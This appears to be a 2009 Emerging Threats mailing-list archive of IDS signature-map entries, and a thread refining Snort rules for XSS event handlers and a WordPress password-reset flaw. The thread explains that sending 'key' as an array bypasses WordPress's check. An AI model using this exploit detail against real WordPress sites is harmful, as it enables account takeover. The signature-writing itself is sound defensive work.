2009733 || ET WEB_SPECIFIC Golabi index_logged.php cur_module Parameter Remote File Inclusion || bugtraq,33916 || url,vupen.com/english/advisories/2009/0553 || url,milw0rm.com/exploits/8112
2009734 || ET WEB_SPECIFIC 212cafe Board view.php qID Parameter SQL Injection || url,milw0rm.com/exploits/6578 || url,xforce.iss.net/xforce/xfdb/45428 || bugtraq,31426
2009735 || ET WEB_ACTIVEX Roxio CinePlayer IAManager.dll ActiveX Control Buffer Overflow || url,milw0rm.com/exploits/8835 || url,xforce.iss.net/xforce/xfdb/50868
2009736 || ET WEB_SPECIFIC ProjectCMS select_image.php dir Parameter Directory Traversal || bugtraq,34816 || url,milw0rm.com/exploits/8608
2009737 || ET WEB_SPECIFIC ProjectCMS admin_theme_remove.php file Parameter Remote Directory Delete || bugtraq,34816 || url,milw0rm.com/exploits/8608
2009738 || ET WEB_SPECIFIC X-BLC get_read.php section Parameter SQL Injection || bugtraq,34197 || url,milw0rm.com/exploits/8258
2009739 || ET WEB_SPECIFIC DMXReady Multiple Products upload_image_category.asp cid Parameter SQL Injection || url,milw0rm.com/exploits/7767 || url,xforce.iss.net/xforce/xfdb/47959 || bugtraq,33253
2009740 || ET WEB_SPECIFIC BibCiter projects.php idp Parameter SQL Injection || url,milw0rm.com/exploits/7814 || bugtraq,33329 || url,secunia.com/advisories/33555
2009741 || ET WEB_SPECIFIC BibCiter contacts.php idc Parameter SQL Injection || url,milw0rm.com/exploits/7814 || bugtraq,33329 || url,secunia.com/advisories/33555
2009742 || ET WEB_SPECIFIC BibCiter users.php idu Parameter SQL Injection || url,milw0rm.com/exploits/7814 || bugtraq,33329 || url,secunia.com/advisories/33555
2009743 || ET WEB_SPECIFIC phpDatingClub website.php page Parameter Local File Inclusion || url,milw0rm.com/exploits/6037 || bugtraq,30176
2009744 || ET WEB_SPECIFIC SuperNews valor.php noticia Parameter SQL Injection || bugtraq,34195 || url,milw0rm.com/exploits/8255
2009745 || ET WEB_SPECIFIC Flatchat pmscript.php with Parameter Local File Inclusion || bugtraq,34734 || url,milw0rm.com/exploits/8549
2009746 || ET WEB_SPECIFIC QuickTeam qte_web.php qte_web_path Parameter Local File Inclusion || url,milw0rm.com/exploits/8602 || url,secunia.com/advisories/34997/
2009747 || ET WEB_SPECIFIC AvailScript Article Script articles.php aIDS Parameter SQL Injection || url,milw0rm.com/exploits/6409 || url,secunia.com/advisories/31816/ || cve,CVE-2008-4371
2404025 || ET DROP Known Bot C&C Server Traffic (group 26) || url,www.shadowserver.org
2405025 || ET DROP Known Bot C&C Traffic (group 26) - BLOCKING SOURCE || url,www.shadowserver.org
2500214 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500215 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500216 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500217 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500218 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500219 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500220 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500221 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500222 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500223 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500224 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500225 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500226 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500227 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500228 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500229 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500230 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500231 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510214 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510215 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510216 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510217 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510218 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510219 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510220 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510221 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510222 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510223 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510224 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510225 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510226 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510227 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510228 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510229 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510230 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510231 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

From kevross33 at googlemail.com Tue Aug 11 08:32:00 2009
From: kevross33 at googlemail.com (Kevin Ross)
Date: Tue, 11 Aug 2009 13:32:00 +0100
Subject: [Emerging-Sigs] some sigs
Message-ID:

some cross site scripting sigs (including a replacement for my onmouseover
sig so it covers more XSS methods and also a wordpress vulnerability sig.
All tested and working and I doubt there will be FPs or poor performance
with these. Any thoughts, comments or issues with them?

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB Onmouse Event in URI - Likely Cross Site Scripting Attempt"; flow:to_server,established; uricontent:"onmouse"; nocase; pcre:"/(over|up|down|out|move)/Ui"; classtype:web-application-attack; reference:url,www.w3schools.com/jsref/jsref_onmouseover.asp; reference:url, www.w3schools.com/jsref/jsref_onmouseup.asp; reference:url, www.w3schools.com/jsref/jsref_onmousedown.asp; reference:url, www.w3schools.com/jsref/jsref_onmouseout.asp; reference:url, www.w3schools.com/jsref/jsref_onmousemove.asp; sid:1900001; rev:1;)

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB Onkey Event in URI - Likely Cross Site Scripting Attempt"; flow:to_server,established; uricontent:"onkey"; nocase; pcre:"/(down|press|up)/Ui"; classtype:web-application-attack; reference:url, www.w3schools.com/jsref/jsref_onkeydown.asp; reference:url, www.w3schools.com/jsref/jsref_onkeypress.asp; reference:url, www.w3schools.com/jsref/jsref_onkeyup.asp; sid:1900002; rev:1;)

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB Onclick Event in URI - Likely Cross Site Scripting Attempt"; flow:to_server,established; uricontent:"onclick"; nocase; classtype:web-application-attack; reference:url, www.w3schools.com/jsref/jsref_onClick.asp; sid:1900003; rev:1;)

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB Onchange Event in URI - Likely Cross Site Scripting Attempt"; flow:to_server,established; uricontent:"onchange"; nocase; classtype:web-application-attack; reference:url, www.w3schools.com/jsref/jsref_onchange.asp; sid:1900003; rev:1;)

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB Onfocus Event in URI - Likely Cross Site Scripting Attempt"; flow:to_server,established; uricontent:"onfocus"; nocase; classtype:web-application-attack; reference:url, www.w3schools.com/jsref/jsref_onfocus.asp; sid:1900004; rev:1;)

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB Onblur Event in URI - Likely Cross Site Scripting Attempt"; flow:to_server,established; uricontent:"onblur"; nocase; classtype:web-application-attack; reference:url, www.w3schools.com/jsref/jsref_onblur.asp; sid:1900005; rev:1;)

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Possibly Wordpress Administrative Password Reset Vulnerability"; flow:to_server,established; uricontent:"/wp-login.php?action=3Drp&key="; nocase; classtype:web-application-attack; reference:url, www.securitytracker.com/alerts/2009/Aug/1022707.html; sid:1900006; rev:1;)

Kevin

From kevross33 at googlemail.com Tue Aug 11 08:32:54 2009
From: kevross33 at googlemail.com (Kevin Ross)
Date: Tue, 11 Aug 2009 13:32:54 +0100
Subject: [Emerging-Sigs] some sigs
In-Reply-To:
References:
Message-ID:

Spelling Correction:

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Possible Wordpress Administrative Password Reset Vulnerability"; flow:to_server,established; uricontent:"/wp-login.php?action=3Drp&key="; nocase; classtype:web-application-attack; reference:url, www.securitytracker.com/alerts/2009/Aug/1022707.html; sid:1900006; rev:1;)

2009/8/11 Kevin Ross

> some cross site scripting sigs (including a replacement for my onmouseover
> sig so it covers more XSS methods and also a wordpress vulnerability sig.
> All tested and working and I doubt there will be FPs or poor performance
> with these. Any thoughts, comments or issues with them?
>
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB
> Onmouse Event in URI - Likely Cross Site Scripting Attempt";
> flow:to_server,established; uricontent:"onmouse"; nocase;
> pcre:"/(over|up|down|out|move)/Ui"; classtype:web-application-attack;
> reference:url,www.w3schools.com/jsref/jsref_onmouseover.asp;
> reference:url,www.w3schools.com/jsref/jsref_onmouseup.asp; reference:url,
> www.w3schools.com/jsref/jsref_onmousedown.asp; reference:url,
> www.w3schools.com/jsref/jsref_onmouseout.asp; reference:url,
> www.w3schools.com/jsref/jsref_onmousemove.asp; sid:1900001; rev:1;)
>
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB Onkey
> Event in URI - Likely Cross Site Scripting Attempt";
> flow:to_server,established; uricontent:"onkey"; nocase;
> pcre:"/(down|press|up)/Ui"; classtype:web-application-attack; reference:url,
> www.w3schools.com/jsref/jsref_onkeydown.asp; reference:url,
> www.w3schools.com/jsref/jsref_onkeypress.asp; reference:url,
> www.w3schools.com/jsref/jsref_onkeyup.asp; sid:1900002; rev:1;)
>
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB
> Onclick Event in URI - Likely Cross Site Scripting Attempt";
> flow:to_server,established; uricontent:"onclick"; nocase;
> classtype:web-application-attack; reference:url,
> www.w3schools.com/jsref/jsref_onClick.asp; sid:1900003; rev:1;)
>
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB
> Onchange Event in URI - Likely Cross Site Scripting Attempt";
> flow:to_server,established; uricontent:"onchange"; nocase;
> classtype:web-application-attack; reference:url,
> www.w3schools.com/jsref/jsref_onchange.asp; sid:1900003; rev:1;)
>
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB
> Onfocus Event in URI - Likely Cross Site Scripting Attempt";
> flow:to_server,established; uricontent:"onfocus"; nocase;
> classtype:web-application-attack; reference:url,
> www.w3schools.com/jsref/jsref_onfocus.asp; sid:1900004; rev:1;)
>
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB
> Onblur Event in URI - Likely Cross Site Scripting Attempt";
> flow:to_server,established; uricontent:"onblur"; nocase;
> classtype:web-application-attack; reference:url,
> www.w3schools.com/jsref/jsref_onblur.asp; sid:1900005; rev:1;)
>
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Possibly
> Wordpress Administrative Password Reset Vulnerability";
> flow:to_server,established; uricontent:"/wp-login.php?action=3Drp&key=";
> nocase; classtype:web-application-attack; reference:url,
> www.securitytracker.com/alerts/2009/Aug/1022707.html; sid:1900006; rev:1;)
>
> Kevin
>

From bojan.isc at gmail.com Tue Aug 11 09:23:20 2009
From: bojan.isc at gmail.com (Bojan Zdrnja (SANS ISC))
Date: Tue, 11 Aug 2009 15:23:20 +0200
Subject: [Emerging-Sigs] some sigs
In-Reply-To:
References:
Message-ID: <9d6a1ae60908110623v4c16d66fo2be8b4d3a4dd71a6@mail.gmail.com>

On Tue, Aug 11, 2009 at 2:32 PM, Kevin Ross wrote:
> Spelling Correction:
>
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Possible
> Wordpress Administrative Password Reset Vulnerability";
> flow:to_server,established; uricontent:"/wp-login.php?action=3Drp&key=";
> nocase; classtype:web-application-attack;
> reference:url,www.securitytracker.com/alerts/2009/Aug/1022707.html;
> sid:1900006; rev:1;)

If I'm not wrong, this will alert on legitimate password resets. You
want to catch it when key is an array (since that will pass the check
in Wordpress' PHP code.
So, I think this rule would be correct:

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Possible Wordpress Administrative Password Reset Vulnerability"; flow:to_server,established; uricontent:"/wp-login.php?action=rp&key[]="; nocase; classtype:web-application-attack; reference:url,www.securitytracker.com/alerts/2009/Aug/1022707.html; sid:1900006; rev:1;)

Cheers,

Bojan

From jonkman at jonkmans.com Tue Aug 11 09:27:04 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Tue, 11 Aug 2009 09:27:04 -0400
Subject: [Emerging-Sigs] some sigs
In-Reply-To: <9d6a1ae60908110623v4c16d66fo2be8b4d3a4dd71a6@mail.gmail.com>
References: <9d6a1ae60908110623v4c16d66fo2be8b4d3a4dd71a6@mail.gmail.com>
Message-ID: <4A8171A8.3010803@jonkmans.com>

Posted this way. Thanks.

By the way, you both get a sig credit in the contest. One for writing and one for a significant modification.

Matt

Bojan Zdrnja (SANS ISC) wrote:
> On Tue, Aug 11, 2009 at 2:32 PM, Kevin Ross wrote:
>> Spelling Correction:
>>
>> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Possible
>> Wordpress Administrative Password Reset Vulnerability";
>> flow:to_server,established; uricontent:"/wp-login.php?action=3Drp&key=";
>> nocase; classtype:web-application-attack;
>> reference:url,www.securitytracker.com/alerts/2009/Aug/1022707.html;
>> sid:1900006; rev:1;)
>
> If I'm not wrong, this will alert on legitimate password resets. You
> want to catch it when key is an array (since that will pass the check
> in Wordpress' PHP code. So, I think this rule would be correct:
>
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
> (msg:"Possible Wordpress Administrative Password Reset Vulnerability";
> flow:to_server,established;
> uricontent:"/wp-login.php?action=rp&key[]="; nocase;
> classtype:web-application-attack;
> reference:url,www.securitytracker.com/alerts/2009/Aug/1022707.html;
> sid:1900006; rev:1;)
>
>
> Cheers,
>
> Bojan
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

--
--------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc

From jonkman at jonkmans.com Tue Aug 11 09:41:13 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Tue, 11 Aug 2009 09:41:13 -0400
Subject: [Emerging-Sigs] Coffee Mug Slogans
Message-ID: <4A8174F9.4020009@jonkmans.com>

I'm very surprised at the closeness of the vote on the slogans.

content:"|C0 FF EE|"; has 251, while

pcre:"/C0ffE{2}\s+Ma\x6Bes\s+Me\s[^S]*Regul4r/ig";

has 248 as of this morning. So I'll leave the voting open another day or
so and see if we can get a better separation.

You can vote at the main page, http://www.emergingthreats.net

Thanks all!

Matt

From eoin.miller at trojanedbinaries.com Tue Aug 11 09:52:44 2009
From: eoin.miller at trojanedbinaries.com (Eoin Miller)
Date: Tue, 11 Aug 2009 09:52:44 -0400
Subject: [Emerging-Sigs] Coffee Mug Slogans
In-Reply-To: <4A8174F9.4020009@jonkmans.com>
References: <4A8174F9.4020009@jonkmans.com>
Message-ID: <4A8177AC.6080004@trojanedbinaries.com>

Matt Jonkman wrote:
> I'm very surprised at the closeness of the vote on the slogans.
>
>
> content:"|C0 FF EE|"; has 251, while
>
> pcre:"/C0ffE{2}\s+Ma\x6Bes\s+Me\s[^S]*Regul4r/ig";
>
> has 248 as of this morning. So I'll leave the voting open another day or
> so and see if we can get a better separation.
>
> You can vote at the main page, http://www.emergingthreats.net
>
> Thanks all!
>
> Matt
>
>
Mugs have two sides (and these are two pretty good ideas).

--
Eoin

From jonkman at jonkmans.com Tue Aug 11 09:57:00 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Tue, 11 Aug 2009 09:57:00 -0400
Subject: [Emerging-Sigs] Coffee Mug Slogans
In-Reply-To: <4A8177AC.6080004@trojanedbinaries.com>
References: <4A8174F9.4020009@jonkmans.com> <4A8177AC.6080004@trojanedbinaries.com>
Message-ID: <4A8178AC.8070404@jonkmans.com>

Eoin Miller wrote:
> Mugs have two sides (and these are two pretty good ideas).

Yes, but unfortunately printing on both sides is expensive, and requires two setup and design fees for the printers. It'd really jack the price of the mugs up. And we're printing in at least two colors (three on anything but white...) We'd end up with 35 dollar mugs if we aren't careful. It's a possibility though if nobody minds paying a bit more. I can look into the pricing to do both.

Matt

From wkitty42 at windstream.net Tue Aug 11 10:40:14 2009
From: wkitty42 at windstream.net (waldo kitty)
Date: Tue, 11 Aug 2009 10:40:14 -0400
Subject: [Emerging-Sigs] Coffee Mug Slogans
In-Reply-To: <4A8177AC.6080004@trojanedbinaries.com>
References: <4A8174F9.4020009@jonkmans.com> <4A8177AC.6080004@trojanedbinaries.com>
Message-ID: <4A8182CE.9020705@windstream.net>

Eoin Miller wrote:
> Matt Jonkman wrote:
>> I'm very surprised at the closeness of the vote on the slogans.
[trim]
>>
> Mugs have two sides (and these are two pretty good ideas).

inside and outside? ;) :P

From kevross33 at googlemail.com Tue Aug 11 11:12:39 2009
From: kevross33 at googlemail.com (Kevin Ross)
Date: Tue, 11 Aug 2009 16:12:39 +0100
Subject: [Emerging-Sigs] some sigs
In-Reply-To: <9d6a1ae60908110623v4c16d66fo2be8b4d3a4dd71a6@mail.gmail.com>
References: <9d6a1ae60908110623v4c16d66fo2be8b4d3a4dd71a6@mail.gmail.com>
Message-ID:

Ah yes I missed that, if you look at the reference for securitytracker the example has [] in it too. Thanks for pointing this out.

2009/8/11 Bojan Zdrnja (SANS ISC)

> On Tue, Aug 11, 2009 at 2:32 PM, Kevin Ross
> wrote:
> > Spelling Correction:
> >
> > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Possible
> > Wordpress Administrative Password Reset Vulnerability";
> > flow:to_server,established; uricontent:"/wp-login.php?action=3Drp&key=";
> > nocase; classtype:web-application-attack;
> > reference:url,www.securitytracker.com/alerts/2009/Aug/1022707.html;
> > sid:1900006; rev:1;)
>
> If I'm not wrong, this will alert on legitimate password resets. You
> want to catch it when key is an array (since that will pass the check
> in Wordpress' PHP code. So, I think this rule would be correct:
>
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
> (msg:"Possible Wordpress Administrative Password Reset Vulnerability";
> flow:to_server,established;
> uricontent:"/wp-login.php?action=rp&key[]="; nocase;
> classtype:web-application-attack;
> reference:url,www.securitytracker.com/alerts/2009/Aug/1022707.html;
> sid:1900006; rev:1;)
>
>
> Cheers,
>
> Bojan
>

From n.gausepohl at insightbb.com Tue Aug 11 11:25:17 2009
From: n.gausepohl at insightbb.com (nicholas gausepohl)
Date: Tue, 11 Aug 2009 11:25:17 -0400
Subject: [Emerging-Sigs] check for user names
Message-ID:

http://namechk.com/

--
Using Opera's revolutionary e-mail client: http://www.opera.com/mail/

From emerging at emergingthreats.net Tue Aug 11 16:00:12 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Tue, 11 Aug 2009 16:00:12 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090811200012.7D8A24504A@goliath.jonkmans.com>

[***] Results from Oinkmaster started Tue Aug 11 16:00:12 2009 [***]

[+++] Added rules: [+++]

2002801 - ET POLICY Google Desktop User-Agent Detected (emerging-policy.rules)
2002838 - ET POLICY Google Search Appliance browsing the Internet (emerging-policy.rules)
2002849 - ET POLICY Google Appliance External Proxy Stylesheet (emerging-policy.rules)
2009748 - ET WEB Possible Wordpress Administrative Password Reset Vulnerability (emerging-web.rules)
2009749 - ET SCAN Unusually Fast 403 Error Messages, Possible Web Application Scan (emerging-scan.rules)

[---] Removed rules: [---]

2002801 - ET WEB_SPECIFIC Google Desktop User-Agent Detected (emerging-web_sql_injection.rules)
2002838 - ET
WEB_SPECIFIC Google Search Appliance browsing the Internet (emerging-web_sql_injection.rules)
2002849 - ET WEB_SPECIFIC Google Appliance External Proxy Stylesheet (emerging-web_sql_injection.rules)

[+++] Added non-rule lines: [+++]

-> Added to emerging-policy.rules (3):
# Submitted by Michael Holstein, 2006-02-13. Reference from scheidell
# Submitted 2006-02-28 by Mark Warren. For Google appliances that "should" only spider internal web sites (but sometimes go wild and spider the Internet)
#by Blake Hartstein of Demarc

-> Added to emerging-sid-msg.map (57):
2002801 || ET POLICY Google Desktop User-Agent Detected || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002801 || url,news.com.com/2100-1032_3-6038197.html
2002838 || ET POLICY Google Search Appliance browsing the Internet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002838 || url,www.google.com/enterprise/gsa/index.html
2002849 || ET POLICY Google Appliance External Proxy Stylesheet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002849 || cve,2005-3758 || bugtraq,15509
2009748 || ET WEB Possible Wordpress Administrative Password Reset Vulnerability || url,www.securitytracker.com/alerts/2009/Aug/1022707.html
2009749 || ET SCAN Unusually Fast 403 Error Messages, Possible Web Application Scan || url,www.checkupdown.com/status/E403.html
2500232 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500233 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510232 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510233 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
